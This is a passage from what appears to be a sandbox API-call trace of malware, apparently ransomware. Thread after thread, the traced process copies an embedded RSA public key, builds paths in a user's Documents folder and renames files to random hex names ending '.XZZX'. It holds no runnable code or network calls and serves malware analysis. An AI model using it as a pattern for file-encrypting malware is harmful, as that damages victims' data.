LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.560] lstrcpyW (in: lpString1=0x420f460, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0107.560] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.560] SetErrorMode (uMode=0x1) returned 0x1 [0107.560] lstrcpyW (in: lpString1=0x420f860, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0107.560] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf40f965f, Data2=0x92a, Data3=0x479a, Data4=([0]=0xa4, [1]=0x49, [2]=0x8e, [3]=0xdc, [4]=0x30, [5]=0x14, [6]=0x49, [7]=0xf0))) returned 0x0 [0107.560] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\0FE24CF432281F2497377D743655036C.XZZX") returned 118 [0107.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0107.560] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\96D8029602902944F40F965F06B10D8C.XZZX") returned 118 [0107.560] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 312 os_tid = 0x604 [0107.709] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.709] lstrcpyW (in: lpString1=0x420f460, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0107.709] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.709] SetErrorMode (uMode=0x1) returned 0x1 [0107.709] lstrcpyW (in: lpString1=0x420f860, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0107.709] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x54d755d1, Data2=0x4cef, Data3=0x4d7b, Data4=([0]=0xa6, [1]=0x13, [2]=0x16, [3]=0x57, [4]=0xed, [5]=0x2c, [6]=0x66, [7]=0x15))) returned 0x0 [0107.709] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned 118 [0107.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0107.709] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\22832A1F1748D9D554D755D11B69BE1D.XZZX") returned 118 [0107.709] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 313 os_tid = 0x420 [0107.864] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.864] lstrcpyW (in: lpString1=0x420f460, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0107.865] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.865] SetErrorMode (uMode=0x1) returned 0x1 [0107.865] lstrcpyW (in: lpString1=0x420f860, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0107.865] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf2f48854, Data2=0xf14c, Data3=0x46e1, Data4=([0]=0xa9, [1]=0xa9, [2]=0xe3, [3]=0xc9, [4]=0xe3, [5]=0x70, [6]=0xd0, [7]=0xcf))) returned 0x0 [0107.865] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned 118 [0107.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0107.865] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\54EF8CF042CEDBCCF2F4885446EFC014.XZZX") returned 118 [0107.865] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 314 os_tid = 0x600 [0108.021] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.021] lstrcpyW (in: lpString1=0x420f460, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0108.021] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.021] SetErrorMode (uMode=0x1) returned 0x1 [0108.021] lstrcpyW (in: lpString1=0x420f860, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0108.021] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xbdb9aaf0, Data2=0xe171, Data3=0x4ceb, Data4=([0]=0xbf, [1]=0x75, [2]=0x1d, [3]=0x53, [4]=0xb9, [5]=0xbc, [6]=0x44, [7]=0x79))) returned 0x0 [0108.021] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\632A4073379A2FDC09389DEB3BC71424.XZZX") returned 118 [0108.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0108.021] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\EE3163F043BC7EBBBDB9AAF047DD6303.XZZX") returned 118 [0108.021] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 315 os_tid = 0x5dc [0108.177] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.177] lstrcpyW (in: lpString1=0x420f460, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0108.177] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.177] SetErrorMode (uMode=0x1) returned 0x1 [0108.177] lstrcpyW (in: lpString1=0x420f860, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0108.177] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xdf9df859, Data2=0xfe6c, Data3=0x47ca, Data4=([0]=0xb7, [1]=0x2, [2]=0xad, [3]=0xad, [4]=0xc0, [5]=0x2d, [6]=0xcb, [7]=0x91))) returned 0x0 [0108.177] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned 118 [0108.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0108.177] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\130D138C4758B538DF9DF8594B799980.XZZX") returned 118 [0108.177] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 316 os_tid = 0x5f4 [0108.333] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.333] lstrcpyW (in: lpString1=0x420f460, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0108.333] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.333] SetErrorMode (uMode=0x1) returned 0x1 [0108.333] lstrcpyW (in: lpString1=0x420f860, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0108.333] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x65193ce9, Data2=0x98f8, Data3=0x4dbb, Data4=([0]=0x9f, [1]=0xd0, [2]=0x16, [3]=0xb9, [4]=0x67, [5]=0x43, [6]=0x23, [7]=0x21))) returned 0x0 [0108.333] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\73C0D9902A7964C0808D031B2E914908.XZZX") returned 118 [0108.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0108.333] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\EC9D59B82E72552865193CE932933970.XZZX") returned 118 [0108.333] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 317 os_tid = 0x5fc [0108.489] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.489] lstrcpyW (in: lpString1=0x420f460, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0108.489] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.489] SetErrorMode (uMode=0x1) returned 0x1 [0108.489] lstrcpyW (in: lpString1=0x420f860, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0108.489] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x1cf537f3, Data2=0xa040, Data3=0x43ac, Data4=([0]=0x87, [1]=0x80, [2]=0xfe, [3]=0x76, [4]=0xf9, [5]=0xf, [6]=0x2c, [7]=0x7f))) returned 0x0 [0108.489] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned 118 [0108.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0108.489] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\8045DCC02A5C6B001CF537F32E7D4F48.XZZX") returned 118 [0108.489] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 318 os_tid = 0x5d8 [0108.645] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.645] lstrcpyW (in: lpString1=0x420f460, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0108.645] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.645] SetErrorMode (uMode=0x1) returned 0x1 [0108.645] lstrcpyW (in: lpString1=0x420f860, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0108.645] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9c42a5c1, Data2=0xcaf3, Data3=0x4e62, Data4=([0]=0xaf, [1]=0xed, [2]=0x43, [3]=0xc3, [4]=0xac, [5]=0xb0, [6]=0x6b, [7]=0x8))) returned 0x0 [0108.645] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned 118 [0108.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: 